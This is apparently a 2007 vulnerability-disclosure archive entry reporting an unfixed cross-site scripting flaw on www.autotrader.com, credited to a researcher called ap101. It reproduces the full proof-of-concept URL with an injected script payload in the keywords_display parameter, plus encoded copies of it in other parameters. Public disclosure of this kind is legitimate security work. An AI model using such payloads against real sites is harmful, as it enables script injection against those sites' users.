Security researcher ap101, has submitted on 16/10/2007 a cross-site-scripting (XSS) vulnerability affecting www.autotrader.com, which at the time of submission ranked 1021 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 17/10/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 16/10/2007 |
Date published: 17/10/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: ap101 |
Domain: www.autotrader.com |
Category: XSS |
Pagerank: 1021 |
URL: http://www.autotrader.com/fyc/no_cars_found.jsp?num_records=25&search_lang=&page_location=findacar%3 A%3Aispsearchform&search_type=both&distance=25&address=80004&marketZipError=false&style_flag=1&make= ALFA&model=&make2=&start_year=1981&end_year=2008&min_price=&max_price=&transmission=&engine=&drive=& doors=&fuel=&max_mileage=&color=&keywords_display=%3Ch1%3Eap101%3C%2Fh1%3E%3Cscript%3Ealert%28%22ap1 01%22%29%3C%2Fscript%3E&sort_type=priceDESC&body_code=0&certified=&advanced=y&default_sort=priceDESC &awsp=false&keywordsrep=0601040490620971120490480490600471040490620601150991141051121160620971081011 14116040034097112049048049034041060047115099114105112116062&keywordsfyc=__PGgxPmFwMTAxPC9oMT48c2NyaX B0PmFsZXJ0KCJhcDEwMSIpPC9zY3JpcHQ___ |
Click here to view the mirror
|
|
|